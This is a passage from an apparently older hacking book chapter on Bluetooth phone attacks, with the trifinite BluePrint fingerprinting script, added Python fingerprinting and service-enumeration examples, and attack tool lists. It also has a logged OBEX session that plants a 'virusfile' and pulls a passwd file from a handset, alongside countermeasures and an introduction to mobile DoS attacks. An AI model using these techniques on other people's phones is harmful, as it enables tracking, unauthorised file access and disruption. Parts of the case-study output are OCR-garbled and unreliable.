00:02:EE@1507908     Nokia            7650                V 3.16/15-08-02/NHL-2NA
00:02:EE@5112150     Nokia            7820                Unknown
00:60:57@1704022     Nokia            N-Gage              Unknown
00:60:57@1704023     Nokia            N-Gage              Unknown
00:60:57@1507402     Nokia            N-Gage              V 3.30 28-08-2003 NEM-4
08:00:46@196613      Sony             Clie PEG TH55       Unknown
00:0A:D9@4063698     Sony Ericsson    T610                R1L013
00:0E:07@4063698     Sony Ericsson    T630                Unknown
00:0A:D9@917518      Sony Ericsson    P800                CXC12529 R2C6
00:0A:D9@1179718     Sony Ericsson    P900                Unknown
00:0A:D9@1180018     Sony Ericsson    P900                Unknown
00:0A:D9@1179678     Sony Ericsson    P900                Unknown
00:0A:D9@4063698     Sony Ericsson    Z600                Unknown
00:01:E3@1188286     Siemens          S55                 Unknown
00:01:E3@1537756     Siemens          S55                 P-Date: 2003-03-31 SW-Version: 12 SW-Date: 2003-03-28 Variant: A 159 Std-Map/SW: 76/14
00:01:E3@1957354     Siemens          S65                 Unknown
01:90:71@1957354     Siemens          SK65                Unknown
00:01:E3@1704023     Siemens          SX1                 Product: SX1 P-Date: 2003-12-14 SVN: 05 Appl SW Date: 21112003 Appl SW: 12:2 05 Date: 2003-11-21 Modem Variant: B 101 Std-Map/SW: 1/5 D-Map/Prov: 1/6 Variant Name: SX1 TMOD-uk-de-nl 05 0003 Lang T9: uk-de-nl/uk-de-nl Codecs: FR/EFR/HR Audio-Patr.: NfV 16 Acc.: None
00:E0:00@983040      Siemens Fujitsu  LOOX 600            Operating System Version: 3.0 (Pocket PC, but version is unknown)

Courtesy: Martin Herfurt and Collin Mulliner

Typically, Blueprinting is a technique commonly employed to gather statistics about manufacturers and vendors. However, it can also be used by an attacker to scan a particular area for the presence of vulnerable mobile phones.

 

Fadia’s Hot Picks for Popular Blueprinting Tools

The easiest method to carry out Blueprinting is to use any of the following tools that are available on the Internet:

  1. Utility Name: Blueprint

Features: Just what the name says!

Download URL: http://www.trifinite.org

 Source Code:

 

#!/usr/bin/perl
#
# BluePrint v0.1
#
# Collin Mulliner and Martin Herfurt
# (c) {collin,martin}@trifinite.org
#
# Reads the output of "sdptool browse" on STDIN, builds the fingerprint
# (the sum of every service record handle multiplied by its RFCOMM
# channel), prefixes it with the first three bytes of the BD_ADDR and
# looks the result up in blueprint.db.

use strict;
use warnings;

# --- config ---

# Database of known fingerprints
my $BP_DB = "blueprint.db";

# --- info ---
if ($#ARGV < 0) {
    print "\nBluePrint v0.1 - by the trifinite group\n" .
          "http://www.trifinite.org\n\n" .
          "usage:\n" .
          "\tsdptool browse --tree XX:XX:XX:XX:XX:XX | ./bp.pl XX:XX:XX:XX:XX:XX <option>\n\n" .
          "option can be one of -mkdb (no database lookup just generate hash)\n" .
          "                     -nomac (don't use the MAC/BD_ADDR for database lookups)\n";
    exit(0);
}

# --- parameters ---

# BD_ADDR: keep only the manufacturer part (first three bytes)
my $BD_ADDR = $ARGV[0];
$BD_ADDR =~ s/:..:..:..$//;

my $mkdb = 0;
if (defined $ARGV[1] && $ARGV[1] eq "-mkdb") {
    $mkdb = 1;
}

my $nomac = 0;
if (defined $ARGV[1] && $ARGV[1] eq "-nomac") {
    $nomac = 1;
}

# --- calc hash ---
# State machine over the sdptool output:
#   0 = waiting for a service record handle
#   1 = handle attribute seen (--tree output); its "Integer" value follows
#   2 = handle known, waiting for the RFCOMM channel of that record
my $state  = 0;
my $fp     = 0;
my $tmp_fp = 0;

while (my $line = <STDIN>) {
    chomp($line);
    $_ = $line;
    if ($state == 0) {
        if (/Service RecHandle/) {
            $state = 2;
            s/^Service RecHandle: //;
            $tmp_fp = hex $_;
        }
        elsif (/ServiceRecordHandle/) {
            $state = 1;
        }
    }
    elsif ($state == 1) {
        if (/Integer/) {
            $state = 2;
            s/.*: //;
            $tmp_fp = hex $_;
        }
    }
    elsif ($state == 2) {
        if (/Channel: /) {
            $state = 0;
            s/.*Channel: //;
            s/^\s+//;
            s/\s+$//;
            $fp = $fp + ($tmp_fp * $_);
        }
        elsif (/Channel\/Port/) {
            $state = 0;
            s/.*: //;
            $fp = $fp + ($tmp_fp * (hex $_));
        }
    }
}

# --- combine FP and BD_ADDR ---
my $h3 = ($nomac == 0) ? $BD_ADDR . '@' . $fp : $fp;

# --- in mkdb mode just print key and exit ---
if ($mkdb == 1) {
    print "$h3\n";
    exit;
}

# --- search database ---
# blueprint.db holds, per entry, one hash line followed by description
# lines and an "EOD" terminator line.
my $p = 0;    # currently inside a matching entry
my $c = 0;    # at least one match found
open(DB, "< $BP_DB") or die "can't open $BP_DB";
while (my $line = <DB>) {
    chomp($line);
    $_ = $line;
    if ($p == 0) {
        if ($nomac == 0 && /^\Q$h3\E$/) {
            $p = 1;
            $c = 1;
            print "$line\n";
        }
        if ($nomac == 1 && /^.*\@$fp$/) {
            $p = 1;
            $c = 1;
            print "$line\n";
        }
    }
    elsif ($p == 1) {
        if (/^EOD/) {
            print "\n";
            # keep reading: there may be more than one match
            $p = 0;
        }
        else {
            print "$line\n";
        }
    }
}
close(DB);

# --- no match found ---
if ($c == 0) {
    print "\nno match found for: $h3\n\n" .
          "Please report the fingerprint and the complete SDP data plus as much\n" .
          "information about the device and the software running on it especially\n" .
          "the software version is of interest.\n\n" .
          "Send everything to: blueprint\@trifinite.org, thank you!\n\n";
}

 

  2. Utility Name: Redfang

Features: It is a brute force tool that finds even non-discoverable Bluetooth devices by performing a randomized attack on the last six bytes of the respective addresses of the device. Very good tool for information gathering purposes! This tool can also be used for OBEX related attacks.

Download URL: http://www.atstake.com

  3. Utility Name: btscanner

Features: It is an information gathering tool that allows attackers to query devices without the need to carry out pairing.

Download URL: http://www.pentest.co.uk
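The hash that Blueprint derives from SDP responses, as an added Python example that is not the trifinite script itself: it parses sdptool browse output, sums record handle times RFCOMM channel over all records, prefixes the manufacturer part of the BD_ADDR and looks the result up in a small table. The SDP text is constructed to mirror the seven Nokia 6310i records of the second listing in Case Study 2, and the lookup table is a hand-picked subset of Table 1.4; both are assumptions for the example, not a full blueprint.db.

```python
import re

# Added example, not the trifinite bp.pl script: the same hash computation in
# Python, fed a constructed sdptool transcript and a tiny lookup table.

# Placeholder lower address bytes, as printed in Case Study 2.
SAMPLE_BD_ADDR = "00:60:57:xx:xx:xx"

# Constructed sample: the seven records of the second "Browsing" listing in
# Case Study 2 (handles 0x10000..0x10006 with their RFCOMM channels).
SAMPLE_SDP = """\
Browsing 00:60:57:xx:xx:xx
Service Name: Fax
Service RecHandle: 0x10000
Protocol Descriptor List:
  "RFCOMM" (0x0003)
    Channel: 2

Service Name: OBEX Object Push
Service RecHandle: 0x10001
Protocol Descriptor List:
  "RFCOMM" (0x0003)
    Channel: 9
  "OBEX" (0x0008)

Service Name: Dial-up networking
Service RecHandle: 0x10002
Protocol Descriptor List:
  "RFCOMM" (0x0003)
    Channel: 1

Service Name: Nokia PC Suite
Service RecHandle: 0x10003
Protocol Descriptor List:
  "RFCOMM" (0x0003)
    Channel: 15

Service Name: COM 1
Service RecHandle: 0x10004
Protocol Descriptor List:
  "RFCOMM" (0x0003)
    Channel: 3

Service Name: Voice Gateway
Service RecHandle: 0x10005
Protocol Descriptor List:
  "RFCOMM" (0x0003)
    Channel: 13

Service Name: Audio Gateway
Service RecHandle: 0x10006
Protocol Descriptor List:
  "RFCOMM" (0x0003)
    Channel: 12
"""

HANDLE_RE = re.compile(r"Service RecHandle:\s*(0x[0-9A-Fa-f]+)")
CHANNEL_RE = re.compile(r"Channel:\s*(\d+)")

# Hand-picked subset of Table 1.4; the real blueprint.db is much larger.
KNOWN_HASHES = {
    "00:60:57@3604685": ("Nokia", "6310/6310i"),
    "00:60:57@1704044": ("Nokia", "3650"),
    "00:0A:D9@4063698": ("Sony Ericsson", "T610"),
}


def service_fingerprint(sdp_text):
    """Sum of record handle * RFCOMM channel over all records (bp.pl's $fp).

    Only the first Channel line after a handle counts, matching the script's
    state machine, which goes back to waiting for a handle after one channel.
    """
    fp = 0
    handle = None
    for line in sdp_text.splitlines():
        m = HANDLE_RE.search(line)
        if m:
            handle = int(m.group(1), 16)
            continue
        m = CHANNEL_RE.search(line)
        if m and handle is not None:
            fp += handle * int(m.group(1))
            handle = None
    return fp


def blueprint_hash(bd_addr, sdp_text, use_mac=True):
    """'MM:MM:MM@fp' with the manufacturer part of the BD_ADDR, or the bare
    fingerprint when use_mac is False (the script's -nomac behaviour)."""
    fp = service_fingerprint(sdp_text)
    if not use_mac:
        return str(fp)
    oui = ":".join(bd_addr.split(":")[:3]).upper()
    return f"{oui}@{fp}"


def identify(bd_addr, sdp_text):
    """Look the hash up; None means 'no match found', as the script reports."""
    return KNOWN_HASHES.get(blueprint_hash(bd_addr, sdp_text))


if __name__ == "__main__":
    print(blueprint_hash(SAMPLE_BD_ADDR, SAMPLE_SDP))  # 00:60:57@3604685
    print(identify(SAMPLE_BD_ADDR, SAMPLE_SDP))       # ('Nokia', '6310/6310i')
```

The computed value matches the 00:60:57@3604685 row of Table 1.4, which shows how little beyond the public SDP records and the address prefix is needed to name a handset model.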

 

Bluetooth Wardriving

Bluetooth Wardriving is fast becoming one of the most common hobbies for a number of teenagers across the world. This hobby entails nothing but walking about crowded places and scanning for Bluetooth devices. This can easily be done with the help of a Bluetooth device and scanning tools available on the Internet. It allows users to map Bluetooth devices to physical locations. Bluetooth Wardriving has become popular for both its voyeuristic and malicious purposes. Typically, three main approaches are used to carry out Bluetooth Wardriving:

Active Search

In this type of scan, the Bluetooth device actively sends out query messages to all Bluetooth devices in a given area in an attempt to discover them. The responses received from all the Bluetooth devices are then logged for future reference. This log file can then be searched for a particular device’s MAC address. It is important to note that such a search method is effective only in discovering those mobile devices that are in discoverable mode.

 

Passive Search

This search method is a more passive one where the attacker passively monitors all communication between all mobile phone devices in a particular region. A specific mobile phone device is identified by looking out for the CAC code (Channel access code) which is computed from the address of the Bluetooth device. Such a search method is effective even if the target mobile device is in the hidden mode.

 

Paging Search

This search method allows an attacker to identify whether a Bluetooth device with a particular MAC address is present in a region or not. In this technique, the attacker sends a connection request to the target device. If a reply is generated, then it means that the target device is present in range. However, on the other hand, if no reply is received, then a time out will take place.

Fadia’s Hot Picks For Popular Bluetooth Hacking Tools

We have already discussed a variety of different Bluetooth related attacks, loopholes and vulnerabilities. Some of the most common and popular Bluetooth Hacking related tools are as follows:

  1. Utility Name: BlueAlert

Features: A Windows based tool that runs on a Bluetooth enabled computer and alerts the user each time a Bluetooth device leaves or enters into range.

Download URL: http://www.tdksystems.com

  2. Utility Name: BlueFang

Features: Similar to the BlueAlert tool.

Download URL: http://www.atstake.com

  3. Utility Name: BlueSniff

Features: A GUI tool that helps attackers to search for both discoverable and hidden Bluetooth devices in range. Excellent tool for Bluetooth wardriving!

Download URL: http://bluesniff.shmoo.com/

  4. Utility Name: BlueSpam

Features: This tool runs on PalmOS and searches for all Bluetooth devices in range and sends them an arbitrary file.

Download URL: http://www.mulliner.org/

  5. Utility Name: btChat

Features: A Bluetooth based Instant Messaging tool that allows Bluetooth enabled devices to chat with one another for free.

Download URL: http://www.mulliner.org/

  6. Utility Name: Bluestumbler

Features: Bluestumbler is a proof of concept tool developed by the owners of A.L. Digital Ltd. This tool allows attackers to monitor and log all visible Bluetooth devices and find out the manufacturer information using blueprinting techniques.

Download URL: Not available to public yet.

  7. Utility Name: BlueBrowse

Features: BlueBrowse is another proof of concept tool developed by the owners of A.L. Digital Ltd. This tool allows attackers to find out all available services on a particular Bluetooth enabled device.

Download URL: Not available to public yet.

  8. Utility Name: Bluefish

Features: Bluefish is a surveillance system that scans for Bluetooth enabled devices and keeps track of their movements. It also has the capability to take a photograph of the location each time a Bluetooth device is found. Typically, it is used for profiling and information gathering purposes.

Download URL: http://www.nobodaddy.org

Hacking Truth: A Bluepot device is nothing but a trap or a bait device that has been set up with the sole aim of luring attackers into attacking. While the attacker is busy attacking the bait mobile device, in the background valuable information is being collected about the patterns and trends of the attackers. Such Bluepot mobile devices are extremely useful in gathering more knowledge and understanding of how attackers function and what kind of tools they use. A bluepot is to mobile phones what a honeypot is to computers. Typically a bluepot device comprises a J2ME mobile phone that imitates a vulnerable phone and secretly records all malicious traffic and activity.

 

 

Vulnerable Mobile Phone Handsets

 

We have already discussed some of the most common and dangerous Bluetooth related attacks being used by attackers. Table 1.5 lists the known vulnerabilities in various mobile phone handsets at the time of print:

Table 1.5: Mobile Phone Vulnerabilities

Mobile Phone Handset    BlueJacking    BlueSnarf Attack    BlueBug Attack
Nokia 6310              Yes            Yes                 No
Nokia 6310i             Yes            Yes                 Yes
Nokia 7650              Yes            No                  Yes
Nokia 8910              Yes            Yes                 Yes
Nokia 8910i             Yes            Yes                 Yes
Sony Ericsson R520m     Yes            Yes                 Yes
Sony Ericsson T39m      Yes
Sony Ericsson T68i      Yes            Yes                 Yes
Sony Ericsson T610      Yes            Yes                 Yes
Sony Ericsson Z1010     Yes            Yes
Sony Ericsson Z600      Yes            Yes                 Yes

 

 

Countermeasures To Bluetooth Hacking

 

  1. One should not enable Bluetooth unless it is absolutely necessary. It is always a good idea to keep your mobile phone device in the Hidden mode to make it all the more difficult for malicious attackers to discover your presence. It is also important to remain alert when you are in crowded places like conferences, shopping malls, offices, movie theatres, airports, etc.
  2. One should not accept files or business cards or any other incoming Bluetooth data from unknown people. In most cases, such unsolicited incoming traffic is nothing but spam or a malicious attack attempt.
  3. One should download and install the latest patches, fixes and updates released by the mobile phone device manufacturer.
  4. Application developers should avoid using short pairing codes (4 digits long) as they make life easier for an attacker. It is advisable to use the available 16 digit long pairing codes for a higher level of security.
  5. Developers and manufacturers must avoid using default pairing codes as they can easily be guessed and cracked by malicious attackers.
  6. One should change the default name of one’s Bluetooth enabled mobile device to prevent private information like handset model name and version from getting displayed to prying eyes.
  7. One should check the list of paired devices on the mobile phone device and remove any unwanted Bluetooth pairings. Typically this can be done by following the steps below (on Nokia 6310, 6310i, 6600, 7650, 8910 or most other models):

  • Select the menu button to browse to the Bluetooth menu > view Paired devices to display a list of paired devices.
  • Select the Delete Pairing option to remove a particular Bluetooth

  8. Governments and organizations around the world must implement more Bluepot systems to study and better understand patterns of Bluetooth related attacks and attack tools.

 

Live Attack Logged Data

 

Case Study 1

The following is an excerpt from the log file of a live attack that was executed using the Affix btftp tool running on Linux:

ankitfadia:# btftp

Affix version: Affix 3.2.0

Welcome to OBEX ftp.

 Type ? for help.

Mode: Bluetooth

SDP: yes

 

ftp> open 00:60:57:17:b3:a5

Service found on channel: 2

Connected.

 

Established connection with my mobile phone device.

 

ftp> ls

drwdx    0    Personal

drwdx    0    Internet

drwdx    0    Business

drwdx    0    Templates

Command complete.
 

A simple file listing command to get a list of files in the default directory on the mobile phone device.

ftp>cd ../

Command complete.

 

 

ftp> cd test

 Command complete.

ftp> ls

drwdx    0    ..

 

ftp> put /etc/test virusfile

Transfer started…

Transfer complete.           

12 bytes sent in 0.0 secs (1028.00 B/s)

 

Successfully uploaded a virus or malicious file to my mobile phone device without any authorization or password entry. The following is the log of a new session:

ftp> ls

drwdx    0    Personal

drwdx    0    Internet

drwdx    0    Business

drwdx    0    Templates

Command complete.

ftp> cd ../

Command complete.

ftp> ls

drwdx    0    ABC.jpeg

drwdx    0    ABCD.jpeg

drwdx    0    Folder1

drwdx    0    Folder2

drwdx    0    Network

drwdx    0    Applications

drwdx    0    etc

drwdx    0    Research

drwdx    0    Favourite.i

drwdx    0    eBooks

drwdx    0    More

drwdx    0    Listing

drwdx    0    E-mails

drwdx    0    Other

drwdx    0    bin

drwdx    0    hosts

Command complete.

 

 

ftp> cd etc

Command complete.

 

ftp> ls

drwdx    0    ABC
drwdx    0    ABCD
drwdx    0    Folder1
drwdx    0    Folder2
drwdx    0    Book1
drwdx    0    Book2
drwdx    0    Book3
drwdx    0    xyz
drwdx    0    pqr
drwdx    0    Curry
drwdx    0    Akanksha
drwdx    0    Alka
drwdx    0    Ankit
drwdx    0    AnkitFadia
drwdx    0    Aditya
drwdx    0    Qabc
drwdx    0    Qabcd
drwdx    0    qabcde
drwdx    0    Others
drwdx    0    MoreData
drwdx    0    passwd
drwdx    0    Pen
drwdx    0    Scripts
drwdx    0    Stanford
drwdx    0    Silicon Valley papers
drwdx    0    San Francisco
drwdx    0    Putra Jaya
drwdx    0    Cyber Jaya
drwdx    0    Singapore
drwdx    0    Bugis
drwdx    0    Evans Lodge
drwdx    0    Photographs
drwdx    0    SQ
drwdx    0    Schwezwan Cafe
drwdx    0    Sanjiv
drwdx    0    Hosts
drwdx    0    Allowed
drwdx    0    Denied
drwdx    0    Websites
drwdx    0    network
drwdx    0    Data
drwdx    0    IPR
drwdx    0    Contracts
drwdx    0    Revenue
drwdx    0    bin
drwdx    0    Tata
drwdx    0    Stocks
drwdx    0    Questions

Command complete.

 

 

ftp> get passwd

Transfer started…

Transfer complete.

3240192 bytes received in 0.05 secs (64803840 B/s)

Downloaded the password file containing account information.

Case Study 2

The following is the log file of a Nokia 6310i mobile device from the Blueprint tool:

00:60:5 7:xx:xx:xx

—info

device: Nokia 6310i

version: V 5.22 15-11-02 NPL-1

V 5.50 03-03-03 NPL-1 (c) NMP date: n/a

type: mobile phone

note: n/a

/—info

Vulnerability List:

  • Buffer Overflow in OBEX stack

see: http:11www.pentest.co.ukIdocumentslptl-2004-01.html

  • Phone book reading without paring

Details:

RFCOMM channels 17 and 18 open and accessable without pairing

Version: V 5.22 15-11-02 NPL-1

 

—sdp

Browsing 00:60:57:xx:xx:xx

Service Name: Fax

Service RecHandle: Ox10000 Service Class ID List:

“Fax” (0x1111)

“Generic Telephony” (0x1204)

Protocol Descriptor List: “L2CAP” (0x0100) ‘`RFCOMM” (0x0003) Channel: 2

Language Base Attr List: code_IS0639: 0x656e encoding: .0x6a

base_offset: Ox100

Profile Descriptor List: “Fax” (0x1111)

Version: Ox0100

Pairing needed!

Service Name: OBEX Object Push Service RecHandle: Ox10001 Service Class ID List: –

“OBEX Object Push” (0x1105) Protocol Descriptor List:

“L2CAP” (0x0100)

“RFCOMM” (0x0003)

Channel: 9

“OBEX” (0x0008)

Language Base Attr List: code_IS0639: 0x656e encoding: Ox6a

base_offset: Ox100

Profile Descriptor List:

“OBEX Object Push” (0x1105) Version: Ox0100

Service Name: Audio Gateway Service RecHandle: 0x10002 Service Class ID List:

“Headset Audio Gateway” (0x1112) “Generic Audio” (0x1203)

Protocol Descriptor List: “L2CAP” (0x0100) “RFCOMM” (0x0003) Channel: 12

Language Base Attr List: code_IS0639: 0x656e encoding: Ox6a

base offiet: Ox100

Profile Descriptor List.’ “Headset” (0x1108) Version: Ox0100

Pairing needed!

Service Name: COM 1 Service RecHandle: 0x10003 Service Class ID List:

“Serial Port” (0x1101) Protocol Descriptor List:

“L2CAP” (0x0100)

“RFCOMM” (0x0003)

Channel: 3

Language Base Attr List:

 Code_ISO639 : 0x656e
encoding: Ox6a base_offset: Ox100

Pairing needed!

Service Name: Voice Gateway

 Service Rec,Flandle: 0x10004

Service ClassID List:

“” (0x111.1)

 

“Generic Audio” (0x1203)

Protocol Descriptor List:

 “L2CAP” (0x0100)

 “RFCOMM” (0x0003)

Channel: 13

Language Base Attr List:

Code_IS0639: 0x656e

encoding: Ox6a

base offiet: Ox100

Profile Descriptor List: “”(0x111e)

Language Base Attr List:

code IS0639: 0x656e

encoding: Ox6a

base offset: Ox100

 

Profile DescriptorList:

“Dialup Networking” (0x1103)

Version: Ox0100

Pairing needed!

/—-sdp

Requesting information ...
  BD Address:  00:60:57:xx:xx:xx
  LMP Version: 1.1 (0x1) LMP Subversion: 0x22c
  Manufacturer: Nokia Mobile Phones (1)
  Features: 0xbf 0x28 0x21 0x00 0x00 0x00 0x00 0x00
    <3-slot packets> <5-slot packets> <encryption> <slot offset>
    <timing accuracy> <role switch> <sniff mode> <SCO link>
    <HV3 packets> <CVSD>
Version: V 5.50 03-03-03 NPL-1 (c) NMP.

Browsing 00:60:57:xx:xx:xx ...
Service Name: Fax
Service RecHandle: 0x10000
Service Class ID List:
  "Fax" (0x1111)
  "Generic Telephony" (0x1204)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 2
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100
Profile Descriptor List:
  "Fax" (0x1111)
    Version: 0x0100

Service Name: OBEX Object Push
Service RecHandle: 0x10001
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 9
  "OBEX" (0x0008)
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100
Profile Descriptor List:
  "OBEX Object Push" (0x1105)
    Version: 0x0100

Service Name: Dial-up networking
Service RecHandle: 0x10002
Service Class ID List:
  "Dialup Networking" (0x1103)
  "Generic Networking" (0x1201)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 1
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100
Profile Descriptor List:
  "Dialup Networking" (0x1103)
    Version: 0x0100

Service Name: Nokia PC Suite
Service RecHandle: 0x10003
Service Class ID List:
  "Serial Port" (0x1101)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 15
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100

Service Name: COM 1
Service RecHandle: 0x10004
Service Class ID List:
  "Serial Port" (0x1101)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 3
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100

Service Name: Voice Gateway
Service RecHandle: 0x10005
Service Class ID List:
  "" (0x111f)
  "Generic Audio" (0x1203)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 13
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100
Profile Descriptor List:
  "" (0x111e)
    Version: 0x0100

Service Name: Audio Gateway
Service RecHandle: 0x10006
Service Class ID List:
  "Headset Audio Gateway" (0x1112)
  "Generic Audio" (0x1203)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 12
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100
Profile Descriptor List:
  "Headset" (0x1108)
    Version: 0x0100
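Listings like the ones above are what an auditor works from when mapping a handset's Bluetooth attack surface, and they are much easier to act on once turned into records. The parser below is an added example, not part of the original text or of the BlueZ tools: it reads output in the layout sdptool browse prints and returns one dictionary per service record, then lists the RFCOMM channels a client could connect to. The embedded input is a constructed sample that repeats two of the Nokia records above, with the address masked as on the page.

```python
import re

# Constructed sample in the layout sdptool browse prints: two of the Nokia
# records from the listing above, address masked as on the page.
SAMPLE_BROWSE = """\
Browsing 00:60:57:xx:xx:xx ...
Service Name: OBEX Object Push
Service RecHandle: 0x10001
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 9
  "OBEX" (0x0008)
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100
Profile Descriptor List:
  "OBEX Object Push" (0x1105)
    Version: 0x0100

Service Name: Dial-up networking
Service RecHandle: 0x10002
Service Class ID List:
  "Dialup Networking" (0x1103)
  "Generic Networking" (0x1201)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 1
Profile Descriptor List:
  "Dialup Networking" (0x1103)
    Version: 0x0100
Pairing needed!
"""

# '"Name" (0x1105)'; typographic quotes are accepted so text pasted from a scan parses too.
UUID_RE = re.compile(r'["\u201c](?P<name>[^"\u201d]*)["\u201d]\s*\((?P<uuid>0x[0-9A-Fa-f]+)\)')

SECTIONS = {
    "Service Class ID List": "classes",
    "Protocol Descriptor List": "protocols",
    "Profile Descriptor List": "profiles",
}

RFCOMM_UUID = 0x0003


def _new_record(name):
    return {"name": name, "handle": None, "classes": [], "protocols": [],
            "profiles": [], "channel": None, "psm": None, "pairing_needed": False}


def parse_sdp_browse(text):
    """Parse sdptool browse output into one dict per service record."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Browsing"):
            continue
        if line.startswith("Service Name:"):
            rec = _new_record(line.split(":", 1)[1].strip())
            records.append(rec)
            section = None
        elif line.startswith("Service RecHandle:"):
            if rec is None or rec["handle"] is not None:   # record without a name attribute
                rec = _new_record("")
                records.append(rec)
            rec["handle"] = int(line.split(":", 1)[1], 16)
            section = None
        elif rec is None:
            continue                                        # text before the first record
        elif line.endswith("List:"):
            section = SECTIONS.get(line[:-1])               # None for Language Base Attr List
        elif line.startswith("Channel:"):
            rec["channel"] = int(line.split(":", 1)[1])     # RFCOMM server channel
        elif line.startswith("PSM:"):
            rec["psm"] = int(line.split(":", 1)[1])         # L2CAP PSM for non-RFCOMM services
        elif line.startswith("Version:") and rec["profiles"]:
            rec["profiles"][-1]["version"] = int(line.split(":", 1)[1], 16)
        elif line == "Pairing needed!":
            rec["pairing_needed"] = True
        elif section:
            m = UUID_RE.search(line)
            if m:
                rec[section].append({"name": m.group("name"), "uuid": int(m.group("uuid"), 16)})
    return records


def rfcomm_services(records):
    """(channel, service name) for every record reachable over RFCOMM, lowest channel first."""
    return sorted((r["channel"], r["name"]) for r in records
                  if r["channel"] is not None
                  and any(p["uuid"] == RFCOMM_UUID for p in r["protocols"]))


if __name__ == "__main__":
    for channel, name in rfcomm_services(parse_sdp_browse(SAMPLE_BROWSE)):
        print(f"RFCOMM channel {channel:2d}: {name}")
```

Feed it the captured output of sdptool browse on a real handset and the RFCOMM list tells you at a glance which services (OBEX Push, DUN, serial ports) are reachable without pairing, which is exactly the information the attacks in the rest of this chapter depend on.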

 

MOBILE DOS ATTACKS

·       Does your mobile phone suddenly hang, crash or reboot for no valid reason?

·       Does the battery of your mobile phone device get depleted on its own?

·       Are you unable to make phone calls or send SMS text messages from your phone because it simply stops working?

Mobile denial of service attacks, or MDOS attacks, are among the more damaging attacks possible against mobile phone devices. They aim to make the target Bluetooth device unusable, so that its Bluetooth communication channels are saturated or stop working altogether. In other words, such attacks are launched to prevent the target mobile device from communicating with any other Bluetooth enabled device. This not only inconveniences the victim but also reduces productivity.

 

Most mobile denial of service attacks exist because of weaknesses in the way a particular Bluetooth protocol stack is implemented. Typically they arise from inadequate handling, validation and bounds checking of incoming data packets. Attackers exploit such loopholes in the implementation to attack the victim mobile device. Mobile DOS attacks are typically aimed at hanging or crashing the target device, or simply at consuming all available bandwidth so that no data transfer can take place.

In layman's terms, in a mobile DOS attack the attacker sends garbled or unending data to the victim mobile device. The victim device can only handle data that follows the Bluetooth rules and cannot make sense of the garbled input; having no defined way to deal with it, it crashes, hangs or reboots. Alternatively, one can describe a mobile DOS attack as one in which the attacker ties up so much memory or bandwidth on the target device that it can no longer serve legitimate users.

Most mobile DOS attacks exist because the data sent by the attacker is not checked for its contents, structure, routing information and length. However, it would be unfair to place all the blame on developers for not building more input validation into the networking protocols themselves: many mobile DOS attacks exploit the normal, legitimate rules of communication protocols such as Bluetooth. Input validation is therefore not the answer to every DOS attack. Although there are many varieties of mobile DOS attack, most can be depicted as follows:

ATTACKER ------ Sends malicious / unending data ------> VICTIM

VICTIM ------ Cannot handle malicious data ------> CRASHES

  1. The attacker uses packet generation software to generate either unending or malformed data. These data packets are then transmitted to the victim mobile device using the specified protocol suite.
  2. Since the victim mobile device cannot handle this malicious data, it crashes, hangs or simply reboots. This happens because the Bluetooth protocol stack at the victim's end does not validate the data it receives.

 

Unfortunately, what makes such attacks all the more dangerous is the fact that they are extremely easy to execute. There are a number of ready to use mobile DOS attack tools available on the Internet that can be easily downloaded and used to carry out attacks against victim mobile devices.

Typically a mobile DOS attack can lead to a number of problems, listed as follows:

 

 

  1. Temporary wastage of critical infrastructure such as bandwidth, memory and systems.
  2. Legitimate users are denied access to important services and data stored on the victim mobile device.
  3. Clients are either completely disconnected or drastically slowed down while accessing data or services on the victim mobile device.
  4. Mobile DOS attacks temporarily render most services offered by the victim mobile device useless. This disrupts development, communication, research and all other forms of work; for an organisation, such attacks can therefore indirectly lead to a short-term loss of revenue.
  5. They can also lead to loss of data and time and wastage of resources, and sometimes cause widespread inconvenience, inefficiency and dissatisfaction.

There are a variety of currently known mobile denial of service attacks, explained in detail later in this chapter, namely:

  1. Bluesmacking (Ping of Death)
  2. Ping Flooding
  3. Jamming
  4. Malformed OBEX Message Attack
  5. Failed Authentication Attack
  6. Extreme Bluejacking
  7. Malformed SMS Text Message Attack
  8. Local Malformed SMS Text Message Attack
  9. Malformed MIDI File DOS Attack
  10. Malformed Format String Vulnerability

Case Studies

Sydney, Australia

     A college student at a local university in Sydney bought herself a brand new Nokia 6310 mobile phone. She was an average mobile phone user who used her phone just for making and receiving calls and sometimes for text messaging. One day, in the middle of a phone call, her mobile phone simply stopped working and became disabled. She pressed every possible button to get the phone working again, but nothing happened. Her phone had for some reason lost all calling, messaging and gaming capabilities; even the OFF button produced no response. Finally, to get her mobile phone working again, she was forced to remove the battery and put it back in. Since then the student has been facing the same problem on a very regular basis.

Paris, France

